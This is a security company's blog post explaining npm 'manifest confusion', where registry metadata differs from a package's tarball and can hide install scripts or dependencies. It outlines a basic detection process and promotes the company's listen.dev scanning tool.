Understanding and Preventing Manifest Confusion

Published by Garnet Research (@research) Garnet Research (@research)
By @research 

A primer on manifest confusion in npm.

The npm ecosystem, built on the foundations of open collaboration and trust, has ironically become a hotbed for a growing number of novel supply chain attacks in the recent past. Bad actors have been actively exploiting the design of the ecosystem — as seen in the recent spam dilemma and dependency confusion attacks in the past. This post discusses another vulnerability of a similar kind, termed as Manifest Confusion.

What is Manifest Confusion?

Recently discovered by Darcy Clarke, a former Engineering Manager at GitHub in a blog post, Manifest Confusion refers to the discrepancy between a package’s metadata published in the npm registry and the actual contents of its tarball.

This vulnerability allows malicious actors to craft packages with altered metadata — such as hidden install scripts and dependencies — posing a significant risk to software supply chains and applications reliant on the npm registry.

Manifest confusion provides an attacker with various methods to carry out supply chain attacks, including:

  1. Introduction of Install Scripts: Lifecycle scripts defined in package.json allow for arbitrary code execution during the installation process. As the leading method for malware delivery in the npm ecosystem (source), install scripts can be concealed in a package’s manifest for malicious purposes. This can lead to the compromise of critical infrastructure (like developer machines and CI pipelines) and the introduction of malicious code in the application bundle
  2. Stealthy Introduction of Dependencies: The flaw also enables an attacker to introduce hidden dependencies (or transitive dependencies) containing malicious code, which can serve as a launchpad for executing sophisticated multi-stage attacks.
  3. Evasion of Detection Mechanisms: Inconsistencies between metadata and tarball contents allow attackers to craft malicious packages that evade security and dependency auditing tools that rely on the upstream registry data as a source of truth.

How to detect Manifest Confusion?

Detecting manifest confusion requires a thorough approach that relies on trusting the actual package contents as a source of truth. Here’s a step-by-step process to identify such anomalies:

  1. Download the package: Obtain the package from the public registry.
  2. Check Metadata: Compare the package’s metadata in the public registry, including name, version, dependencies, scripts, and other details.
  3. Compare with local package contents: Analyze the metadata and contents of the local package, checking for any discrepancies that indicate tampering.

How listen.dev protects against Manifest Confusion

We’re building listen.dev to protect against the evolving nature of modern supply chain threats. Our team is pleased to announce that our system not only remained unaffected from the manifest confusion vulnerability, but also provides comprehensive coverage to detect and block risks of this nature.

Powered by a multi-layered analysis approach, listen.dev offers unique detection capabilities against known and unknown threats that traditional dependency scanners or SCA tools might miss. To see this in action, lets examine the PoC package published by Darcy and what listen.dev detects at various layers:

Get early access to listen.dev

The features shown below are in private preview. If you’re interested in early access, please reach out at [email protected].

Heuristic-based Metadata Analysis

listen.dev analyzes and compares upstream package metadata against the actual contents of the tarball. This process identifies discrepancies such as the ones exploited in manifest confusion and flags potential risk. listen.dev metadata analysis

Static Analysis of Package Code

listen.dev conducts static analysis of package source code against a set of known heuristics of supply chain risks, relying on the actual tarball bundle as the source of truth. This approach flags install scripts and potentially malicious code, as shown below. listen.dev static analysis

Dynamic Behavioral Analysis

listen.dev goes beyond static analysis by pre-installing packages and observing their runtime behavior in a sandboxed environment. Powered by eBPF, this approach provides deep visibility on activities (such as execution of install scripts) in the entire dependency tree–allowing for proactive detection of suspicious behavior in packages, even if those risks are unknown or not published in advisories.

listen.dev dynamic analysis

Below is an example of the full package page for the PoC package, showing a consolidated view of detected issues.

Manifest Confusion Detection

Impact on the ecosystem

The npm ecosystem and its associated tooling has traditionally utilized client-side validation, operating under the assumption that metadata and tarball contents are consistent. However, this trust-based approach exposes a loophole that can be exploited, underlining the need for cross-validation and rethinking of the ecosystem’s design and security.

Manifest confusion poses a significant threat to critical software infrastructure and the larger open-source community. As a newly discovered attack vector, we recommend exercising extra caution against it through adopting proactive detection measures, leveraging state-of-the-art tooling and increasing awareness.

Stay tuned for our work in this area. If you’re interested in early access, we would love to hear from you!.